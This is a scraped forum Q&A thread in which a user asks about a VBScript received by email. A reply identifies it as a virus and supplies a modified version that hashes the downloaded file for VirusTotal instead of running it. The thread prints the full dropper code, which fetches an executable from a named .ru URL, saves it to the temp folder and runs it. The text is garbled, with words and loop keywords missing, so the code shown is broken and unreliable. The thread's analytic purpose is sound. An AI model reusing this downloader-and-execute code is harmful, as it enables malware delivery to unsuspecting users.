vbscript - Possible Extortion of Data -
someone sent me email vbs script, don't know don't know vbs.
i guessing swindle extort data me, can't tell data. can please exlpain scrtipt do?
sub httpupload( myurl, mypath ) dim objshell set objshell = wscript.createobject( "wscript.shell" ) dim i, objfile, objfso, objhttp, strfile, strmsg const forreading = 1, forwriting = 2, forappending = 8 set objfso = createobject( "scripting.filesystemobject" ) const temporaryfolder = 2 set tfolder = objfso.getspecialfolder(temporaryfolder) tname = objfso.gettempname + ".exe" mypath = tfolder + "/" + tname set objfile = tfolder.createtextfile(tname) set objhttp = createobject( "winhttp.winhttprequest.5.1" ) objhttp.open "get", myurl, false objhttp.send = 1 lenb( objhttp.responsebody ) objfile.write chr( ascb( midb( objhttp.responsebody, i, 1 ) ) ) next objfile.close( ) objshell.run(mypath) set objshell = nothing end sub httpupload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""
as other guy stated, virus. it's downloading binary data, writing exe , firing off.. modify code below. ... delete email , forget dude. know not "everyone" crazy of when comes finding viruses in wild.. hoard these things , study them.
i've amended changes provide md5 hash , sha256 hash that's searchable on virustotal , delete file after. need re-append line httpupload... , download... if see below removed line attempting use .run method.
httpupload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", "" the link provided cut off, if still have vbs file, remove whole section of sub httpupload thru end sub right before it... replace entire content of vbs file except line mentioned above.
sub httpupload( myurl, mypath ) dim objshell set objshell = wscript.createobject( "wscript.shell" ) dim i, objfile, objfso, objhttp, strfile, strmsg const forreading = 1, forwriting = 2, forappending = 8 set objfso = createobject( "scripting.filesystemobject" ) const temporaryfolder = 2 set tfolder = objfso.getspecialfolder(temporaryfolder) tname = objfso.gettempname + ".exe" mypath = tfolder + "/" + tname set objfile = tfolder.createtextfile(tname) set objhttp = createobject( "winhttp.winhttprequest.5.1" ) objhttp.open "get", myurl, false objhttp.send = 1 lenb( objhttp.responsebody ) objfile.write chr( ascb( midb( objhttp.responsebody, i, 1 ) ) ) next objfile.close( ) wscript.echo " md5hash: " & md5hash(spath) & vbcrlf & " sha256hash: " & sha256hash(spath) set objshell = nothing end sub function md5hash(spath) md5hash = bytestohex(md5hashbytes(getbytes(spath))) end function function sha256hash(spath) sha256hash = bytestohex(sha256hashbytes(getbytes(spath))) end function function md5hashbytes(abytes) set objmd5 = createobject("system.security.cryptography.md5cryptoserviceprovider") objmd5.initialize() md5hashbytes = objmd5.computehash_2( (abytes) ) end function function sha256hashbytes(abytes) 'set objsha256 = createobject("system.security.cryptography.md5cryptoserviceprovider") set objsha256 = createobject("system.security.cryptography.sha256managed") objsha256.initialize() sha256hashbytes = objsha256.computehash_2( (abytes) ) end function function stringtoutfbytes(astring) set utf8 = createobject("system.text.utf8encoding") stringtoutfbytes = utf8.getbytes_4(astring) end function function bytestohex(abytes) x = 1 lenb(abytes) hexstr=hex(ascb(midb((abytes), x, 1))) if len(hexstr) = 1 hexstr ="0" & hexstr bytestohex=bytestohex & hexstr next end function function bytestobase64(varbytes) createobject("msxml2.domdocument").createelement("b64") .datatype = "bin.base64" .nodetypedvalue = varbytes bytestobase64 = .text end end function function getbytes(spath) createobject("adodb.stream") .type = 1 .open .loadfromfile spath .position = 0 getbytes = .read .close end end function
Comments
Post a Comment